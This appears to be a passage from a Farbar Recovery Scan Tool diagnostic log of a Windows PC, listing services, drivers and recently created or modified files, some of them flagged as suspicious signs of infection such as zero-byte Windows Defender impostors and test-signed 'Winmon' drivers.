R2 RIM Tunnel Service; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe [1355000 2015-05-26] (BlackBerry Ltd. -> BlackBerry Limited)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246872 2017-11-17] (Synaptics Incorporated -> Synaptics Incorporated)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer -> TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [0 ] (CreateFileW function failed -> ) <==== ATTENTION (zero byte File/Folder)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 2CCD359FD649; C:\Windows\2CCD359FD649.sys [621928 2019-02-08] (韵羽健康管理咨询(上海)有限公司 -> VxDriver)
R3 Accelerometer; C:\Windows\system32\DRIVERS\Accelerometer.sys [43840 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company)
R3 AgereSoftModem; C:\Windows\system32\DRIVERS\agrsm64.sys [1230104 2015-08-05] (Microsoft Windows Hardware Compatibility Publisher -> LSI Corporation)
S3 androidusb; C:\Windows\System32\Drivers\wsadb.sys [38008 2017-11-10] (Anvsoft Inc. -> Google Inc)
S3 blackberryncm; C:\Windows\system32\DRIVERS\blackberryncm6_AMD64.sys [25600 2015-01-23] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 btwavdt; C:\Windows\system32\DRIVERS\btwavdt.sys [230656 2015-03-13] (Broadcom Corporation -> Broadcom Corporation.)
S3 BTWUSB; C:\Windows\System32\Drivers\btwusb.sys [66136 2015-11-25] (Broadcom Corporation -> Broadcom Corporation.)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 e1cexpress; C:\Windows\system32\DRIVERS\e1c64x64.sys [468752 2014-07-29] (Intel Corporation -> Intel Corporation)
R0 hpdskflt; C:\Windows\System32\DRIVERS\hpdskflt.sys [31040 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company)
S3 hwdatacard; C:\Windows\system32\DRIVERS\ewusbmdm.sys [116864 2009-06-03] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
S3 Netaapl; C:\Windows\system32\DRIVERS\netaapl64.sys [23040 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.)
R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3349984 2014-03-08] (Intel Corporation-Mobile Wireless Group -> Intel Corporation)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [80384 2015-01-14] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 rimvndis; C:\Windows\System32\Drivers\rimvndis6_AMD64.sys [18432 2015-05-26] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 RimVSerPort; C:\Windows\system32\DRIVERS\RimSerial_AMD64.sys [44544 2012-12-10] (Microsoft Windows Hardware Compatibility Publisher -> Research in Motion Ltd)
R3 SPUVCbv; C:\Windows\System32\Drivers\SPUVCbv64.sys [749824 2017-11-27] (Sunplus Innovation Technology Inc. -> Sunplus Innovation Technology Inc.)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] (WDKTestCert Admin,131480495282941941 -> ) <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-02-12] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
S3 WinRing0_1_2_0; \??\C:\Users\Stanley\AppData\Local\Temp\7ZipSfx.000\bin\tools\openhardwaremonitor\OpenHardwareMonitor.sys [X] <==== ATTENTION

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-02-12 06:47 - 2019-02-12 06:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\EpicNet Inc
2019-02-12 06:45 - 2019-02-12 06:45 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-02-12 06:43 - 2019-02-12 06:43 - 000003570 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2019-02-12 06:37 - 2019-02-12 06:38 - 000000000 ____D C:\AdwCleaner
2019-02-12 06:36 - 2019-02-12 06:36 - 007316688 _____ (Malwarebytes) C:\Users\Stanley\Downloads\AdwCleaner.exe
2019-02-12 05:59 - 2019-02-12 05:59 - 000104160 _____ C:\Users\Stanley\Downloads\Shortcut.txt
2019-02-12 05:53 - 2019-02-12 07:09 - 000000000 ____D C:\Users\Stanley\Downloads\FRST
2019-02-12 05:33 - 2019-02-12 07:09 - 000000000 ____D C:\FRST
2019-02-12 05:24 - 2019-02-12 05:24 - 000001883 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-02-12 05:24 - 2019-02-12 05:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-02-12 05:23 - 2019-02-12 05:23 - 000000000 ____D C:\Program Files\Malwarebytes
2019-02-12 05:23 - 2018-04-26 05:36 - 000152184 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-02-10 21:40 - 2019-02-10 21:40 - 000001483 _____ C:\Users\Stanley\Desktop\iexplore.exe - Shortcut.lnk
2019-02-10 07:29 - 2019-02-10 07:34 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-500
2019-02-10 07:28 - 2019-02-10 07:28 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Hewlett-Packard
2019-02-10 07:25 - 2019-02-10 20:12 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Apple Computer
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Hewlett-Packard
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\OpenVPN
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Apple Computer
2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Packages
2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator
2019-02-10 07:24 - 2019-02-10 07:24 - 000001442 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-02-10 07:24 - 2019-02-10 07:24 - 000000020 ___SH C:\Users\Administrator\ntuser.ini
2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Adobe
2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Local\Google
2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2019-02-09 02:21 - 2019-02-09 02:21 - 000000000 ____D C:\Windows\pss
2019-02-09 01:51 - 2018-05-22 23:04 - 075629776 _____ (Malwarebytes ) C:\Users\Stanley\Desktop\MalwareBytes-setup-consumer-3.5.1.2522-1.0.365-1.0.5188.exe
2019-02-09 01:24 - 2019-02-09 01:24 - 000000146 _____ C:\Users\Stanley\Desktop\Windows Defender - Shortcut.lnk
2019-02-09 00:58 - 2019-02-12 06:42 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\uTorrent
2019-02-09 00:25 - 2019-02-12 05:23 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-02-08 23:58 - 2019-02-08 23:58 - 000003194 _____ C:\Windows\System32\Tasks\{E2C35618-CCBE-4D12-A910-891C3DC29DF9}
2019-02-08 22:53 - 2019-02-12 06:43 - 000003242 _____ C:\Windows\System32\Tasks\csrss
2019-02-08 22:53 - 2019-02-08 22:56 - 007406936 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-02-08 22:53 - 2019-02-08 22:56 - 001536112 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2019-02-08 22:53 - 2019-02-08 22:53 - 000000000 ____D C:\Users\#Strazzo.RoseGold##
2019-02-08 22:50 - 2019-02-08 22:50 - 000621928 _____ (VxDriver) C:\Windows\2CCD359FD649.sys
2019-02-08 22:49 - 2019-02-08 22:49 - 000000000 ____D C:\Users\Stanley\AppData\Local\{01801827-6513-4a10-9443-a405dbafb4d3}
2019-02-07 05:47 - 2019-02-07 05:47 - 000001178 _____ C:\Users\Public\Desktop\PhoneRescue.lnk
2019-02-07 05:40 - 2019-02-07 08:03 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Decipher Media
2019-02-07 05:25 - 2019-02-07 05:36 - 045726776 _____ (Decipher Media) C:\Users\Stanley\Downloads\DecipherBackupRepair.exe
2019-02-07 04:32 - 2019-02-07 04:39 - 040754877 _____ (iMacTools ) C:\Users\Stanley\Downloads\iBackupViewerSetup.exe
2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\iBackup Viewer
2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\CrashRpt
2019-02-07 03:11 - 2019-02-07 03:11 - 000000000 ____D C:\Users\Stanley\Documents\Apowersoft
2019-02-07 03:10 - 2019-02-07 03:10 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apowersoft
2019-02-07 02:04 - 2019-02-07 02:04 - 000000000 ____D C:\Users\Stanley\AppData\Local\Reincubate Temporary Files
2019-02-06 20:03 - 2019-02-06 20:06 - 006258864 _____ (iMobie Inc. ) C:\Users\Stanley\Downloads\phonebrowse-64-setup.exe
2019-02-06 19:48 - 2019-02-06 19:54 - 021424360 _____ (Reincubate Ltd) C:\Users\Stanley\Downloads\iphonebackupextractor-latest.exe
2019-02-06 05:53 - 2019-02-06 05:53 - 000000000 ____D C:\Users\Stanley\Downloads\MM_VideoDownload
2019-02-06 05:53 - 2019-02-06 05:53 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobiMoverUI
2019-02-06 05:30 - 2019-02-06 05:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\SystemAcCrux
2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\WindSolutions
2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\ProgramData\WindSolutions
2019-02-06 04:46 - 2019-02-06 04:46 - 000000000 ____D C:\Users\Stanley\AppData\Local\FoneDog
2019-02-06 04:26 - 2019-02-06 04:27 - 008046792 _____ (WindSolutions) C:\Users\Stanley\Downloads\Install_CopyTransControlCenter.exe
2019-02-06 04:23 - 2019-02-06 04:23 - 000000000 ____D C:\Users\Stanley\AppData\Local\Aiseesoft Studio
2019-02-05 11:35 - 2019-02-06 04:26 - 030804013 _____ (FoneDog ) C:\Users\Stanley\Downloads\fonedog-ios-toolkit.exe
2019-02-05 11:35 - 2019-02-05 11:35 - 000001133 _____ C:\Users\Stanley\Desktop\Syncios.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000002343 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios Data Recovery.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000002331 _____ C:\Users\Public\Desktop\Syncios Data Recovery.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios
2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\Program Files (x86)\Syncios Data Recovery
2019-02-05 01:46 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple Computer
2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\Documents\Wondershare
2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobileBackupForeverIni
2019-02-05 00:50 - 2019-02-05 00:50 - 007878144 _____ C:\Users\Stanley\AppData\Local\agent.dat
2019-02-05 00:50 - 2019-02-05 00:50 - 002037348 _____ C:\Users\Stanley\AppData\Local\Ran-Lex.tst
2019-02-05 00:50 - 2019-02-05 00:50 - 001895382 _____ C:\Users\Stanley\AppData\Local\Dingzap.bin
2019-02-05 00:50 - 2019-02-05 00:50 - 000278509 _____ C:\Users\Stanley\AppData\Local\Dingbam.tst
2019-02-05 00:50 - 2019-02-05 00:50 - 000126464 _____ C:\Users\Stanley\AppData\Local\noah.dat
2019-02-05 00:50 - 2019-02-05 00:50 - 000070896 _____ C:\Users\Stanley\AppData\Local\Config.xml
2019-02-05 00:50 - 2019-02-05 00:50 - 000005568 _____ C:\Users\Stanley\AppData\Local\md.xml
2019-02-05 00:50 - 2019-02-05 00:50 - 000000000 ____D C:\Users\Stanley\AppData\Local\AdvinstAnalytics
2019-02-05 00:50 - 2019-02-05 00:49 - 001632256 _____ (TODO: <Company name>) C:\Users\Stanley\AppData\Local\Ran-Lex.exe
2019-02-05 00:50 - 2019-02-05 00:49 - 001632256 _____ (TODO: <Company name>) C:\Users\Stanley\AppData\Local\Dingbam.exe
2019-02-05 00:49 - 2019-02-05 01:33 - 000722944 _____ C:\Users\Stanley\AppData\Local\sham.db
2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ C:\Users\Stanley\AppData\Local\installer.dat
2019-02-05 00:31 - 2019-02-05 01:39 - 000000000 ____D C:\Users\Stanley\AppData\Local\Deployment
2019-02-05 00:31 - 2019-02-05 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\Apps\2.0
2019-02-04 23:57 - 2019-02-04 23:57 - 000000000 ____D C:\Users\Stanley\AppData\Local\DigiDNA
2019-02-04 23:54 - 2019-02-05 00:05 - 112497792 _____ C:\Users\Stanley\Downloads\setup_syncios (1).exe
2019-02-04 22:32 - 2019-02-04 22:32 - 000000000 ____D C:\Users\RoseGold\Documents\Syncios
2019-02-02 10:43 - 2019-02-02 10:43 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple
2019-01-31 12:39 - 2019-01-31 12:39 - 000048210 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-23 at 1.56.07 PM.jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM.jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM (1).jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000046824 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-20 at 8.50.51 PM.jpeg
2019-01-31 10:17 - 2019-01-31 10:17 - 000046880 _____ C:\Users\Stanley\Downloads\usd slip1.jpeg
2019-01-30 07:56 - 2019-02-10 07:34 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1004
2019-01-30 07:52 - 2019-01-31 06:21 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\hpqlog
2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios
2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Apple Computer
2019-01-30 07:51 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\.android
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios Data Transfer
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\SyncDroid
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Research In Motion
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\BlackBerry
2019-01-30 07:48 - 2019-02-12 06:38 - 000001446 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-01-30 07:48 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Packages
2019-01-30 07:48 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold
2019-01-30 07:48 - 2019-01-30 07:48 - 000000020 ___SH C:\Users\RoseGold\ntuser.ini
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Adobe
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\VirtualStore
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Google
2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2019-01-27 09:06 - 2019-01-27 09:06 - 000202698 _____ C:\Users\Stanley\Downloads\114328 (1).pdf
2019-01-27 08:22 - 2019-01-27 08:22 - 000202698 _____ C:\Users\Stanley\Downloads\114328.pdf
2019-01-26 22:39 - 2019-01-26 22:39 - 000001160 _____ C:\Users\Stanley\Downloads\converted_1082592538.txt
2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ___HD C:\OneDriveTemp
2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ____D C:\Users\Stanley\OneDrive
2019-01-26 14:55 - 2019-01-26 14:55 - 000075241 _____ C:\Users\Stanley\Downloads\newocr.com-20190126135542.pdf
2019-01-26 14:01 - 2019-01-26 14:01 - 000351579 _____ C:\Users\Stanley\Downloads\001 (2).pdf
2019-01-26 13:59 - 2019-01-26 13:59 - 000315587 _____ C:\Users\Stanley\Downloads\001 (1).pdf
2019-01-26 13:53 - 2019-01-26 13:53 - 000271265 _____ C:\Users\Stanley\Downloads\topdf.zip
2019-01-26 13:53 - 2019-01-26 13:52 - 000315587 _____ C:\Users\Stanley\Downloads\001.pdf
2019-01-26 06:02 - 2019-01-26 06:02 - 000001759 _____ C:\Users\Public\Desktop\iTunes.lnk
2019-01-26 06:02 - 2019-01-26 06:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2019-01-26 06:01 - 2019-01-26 06:01 - 000000000 ____D C:\Program Files\iPod
2019-01-26 06:00 - 2019-01-26 06:02 - 000000000 ____D C:\Program Files\iTunes
2019-01-26 05:48 - 2019-01-26 05:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2019-01-22 12:20 - 2019-01-22 12:21 - 000860720 _____ C:\Users\Stanley\Downloads\Ηλεκτρολογικός εξοπλισμός.2016714105916.xlsx
2019-01-21 12:46 - 2019-01-21 12:46 - 003864349 _____ C:\Users\Stanley\Downloads\GPP002-Schneider-Ersatzteile (1).xlsx
2019-01-21 09:17 - 2019-01-21 09:17 - 000215164 _____ C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI222.srt
2019-01-21 02:12 - 2018-12-14 15:23 - 000107584 ____N C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI.srt
2019-01-21 02:09 - 2019-01-21 09:18 - 000039742 _____ C:\Users\Stanley\Downloads\hunter_killer_english_1340435.zip
2019-01-19 16:06 - 2019-02-10 22:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Monopoly Here & Now Edition
2019-01-19 16:06 - 2019-01-19 16:06 - 000000145 _____ C:\Users\Stanley\Desktop\More SpinTop Games.url
2019-01-19 16:06 - 2019-01-19 16:06 - 000000000 ____D C:\ProgramData\TEMP
2019-01-19 16:02 - 2019-01-19 16:03 - 015141368 _____ C:\Users\Stanley\Downloads\MonopolyHNSetup.exe
2019-01-17 08:42 - 2019-01-17 08:42 - 000019680 _____ C:\Users\Stanley\Downloads\oblivion-2013-1080p.torrent
2019-01-14 15:26 - 2019-01-14 15:26 - 000180948 _____ C:\Users\Stanley\Downloads\BOM_Piping (1).xlsx

==================== One month (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-02-12 07:08 - 2018-05-12 16:21 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\uTorrent
2019-02-12 06:47 - 2014-11-22 04:09 - 000176404 _____ C:\Windows\system32\PerfStringBackup.INI
2019-02-12 06:47 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf
2019-02-12 06:46 - 2018-05-03 17:58 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1001
2019-02-12 06:43 - 2018-12-27 19:56 - 000000000 ___RD C:\Users\Stanley\iCloudDrive
2019-02-12 06:40 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-02-12 06:38 - 2018-06-24 08:33 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-02-12 06:38 - 2018-05-12 16:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2019-02-12 06:20 - 2018-08-24 13:48 - 000000510 _____ C:\Windows\Tasks\UCBrowserUpdater.job
2019-02-12 05:45 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DMCache
2019-02-12 05:22 - 2018-05-09 14:30 - 000507392 ___SH C:\Users\Stanley\Downloads\Thumbs.db
2019-02-12 00:58 - 2013-08-22 14:25 - 000524288 ___SH C:\Windows\system32\config\BBI
2019-02-10 23:14 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Transfer
2019-02-10 23:08 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\Registration
2019-02-10 22:22 - 2018-05-04 17:00 - 000000000 ____D C:\Program Files\Opera
2019-02-10 22:09 - 2018-05-14 11:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinAce
2019-02-10 22:04 - 2018-05-22 09:22 - 000168960 ___SH C:\Users\Stanley\Desktop\Thumbs.db
2019-02-10 22:04 - 2018-05-04 12:30 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Mozilla
2019-02-10 21:35 - 2018-06-24 08:33 - 000002288 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-02-10 07:30 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\AppReadiness
2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iMobie
2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\Program Files (x86)\iMobie
2019-02-09 01:00 - 2018-05-04 20:08 - 000001326 _____ C:\Users\Public\Desktop\Skype.lnk
2019-02-09 01:00 - 2018-05-04 20:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2019-02-08 23:59 - 2018-05-03 23:45 - 000000082 _____ C:\Windows\SysWOW64\winsevr.dat
2019-02-08 23:50 - 2018-05-12 16:08 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\uTorrent Web
2019-02-08 23:41 - 2019-01-10 13:08 - 000000414 _____ C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job
2019-02-08 23:36 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\IDM
2019-02-08 23:00 - 2018-10-18 01:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
2019-02-08 23:00 - 2018-10-18 01:09 - 000000000 ____D C:\ProgramData\iSkysoft
2019-02-07 05:29 - 2018-04-10 15:07 - 000000000 ____D C:\Users\Stanley\Desktop\URCH
2019-02-07 02:08 - 2018-10-18 00:38 - 000000000 ____D C:\Users\Stanley\AppData\Local\iMobie_Inc
2019-02-07 02:04 - 2019-01-10 13:08 - 000003256 _____ C:\Windows\System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##
2019-02-06 07:21 - 2018-10-20 09:06 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Recovery
2019-02-06 06:29 - 2018-04-24 22:26 - 000000000 ____D C:\Program Files\Recuva
2019-02-06 06:23 - 2018-05-19 23:54 - 000363748 _____ C:\Users\Stanley\Desktop\arms & ammunition.txt
2019-02-06 06:00 - 2018-04-23 21:43 - 000000000 ____D C:\lNTEL
2019-02-06 05:57 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\Downloads\Compressed
2019-02-05 11:33 - 2018-06-06 18:08 - 000000000 ____D C:\Program Files (x86)\Anvsoft
2019-02-05 09:51 - 2018-06-06 21:44 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apple Computer
2019-02-05 09:51 - 2018-05-03 17:51 - 000000000 ____D C:\Users\Stanley
2019-02-05 07:07 - 2018-10-18 00:12 - 000000000 ____D C:\ProgramData\Wondershare
2019-02-05 07:06 - 2018-10-18 01:06 - 000000000 ____D C:\Users\Public\Documents\iSkysoft
2019-02-05 07:05 - 2018-10-18 01:09 - 000000000 ____D C:\Program Files (x86)\iSkysoft
2019-02-05 01:31 - 2018-10-18 00:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2019-02-05 00:37 - 2018-10-18 00:06 - 000000000 ____D C:\Users\Public\Documents\Wondershare
2019-02-05 00:16 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios
2019-02-05 00:15 - 2018-08-24 13:48 - 000003482 _____ C:\Windows\System32\Tasks\UCBrowserUpdater
2019-02-03 10:53 - 2018-06-03 09:29 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\vlc
2019-01-26 22:19 - 2018-12-27 19:45 - 000000000 ___RD C:\Users\Stanley\OneDrive (3).old
2019-01-25 09:31 - 2018-06-04 00:07 - 000000000 ____D C:\Users\Stanley\AppData\Local\ElevatedDiagnostics
2019-01-24 10:28 - 2018-06-03 08:56 - 000000887 _____ C:\Users\Public\Desktop\VLC media player.lnk
2019-01-23 15:45 - 2018-05-04 07:39 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-01-15 17:31 - 2018-05-04 17:06 - 000003842 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1525449700
2019-01-15 17:31 - 2018-05-04 17:01 - 000001021 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk
2019-01-14 09:36 - 2019-01-12 18:34 - 000000000 ____D C:\Windows\LastGood

==================== Files in the root of some directories =======

2018-08-18 10:56 - 2014-12-19 17:43 - 000000034 _____ () C:\Users\Stanley\AppData\Roaming\pdfdrawcodec.dll
2019-02-05 00:50 - 2019-02-05 00:50 - 007878144 _____ () C:\Users\Stanley\AppData\Local\agent.dat
2019-02-05 00:50 - 2019-02-05 00:50 - 000070896 _____ () C:\Users\Stanley\AppData\Local\Config.xml
2019-01-02 14:34 - 2019-01-02 14:34 - 000003584 _____ () C:\Users\Stanley\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-02-05 00:50 - 2019-02-05 00:49 - 001632256 _____ (TODO: <Company name>) C:\Users\Stanley\AppData\Local\Dingbam.exe
2019-02-05 00:50 - 2019-02-05 00:50 - 000278509 _____ () C:\Users\Stanley\AppData\Local\Dingbam.tst
2019-02-05 00:50 - 2019-02-05 00:50 - 001895382 _____ () C:\Users\Stanley\AppData\Local\Dingzap.bin
2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ () C:\Users\Stanley\AppData\Local\installer.dat
2019-02-05 00:50 - 2019-02-05 00:50 - 000005568 _____ () C:\Users\Stanley\AppData\Local\md.xml
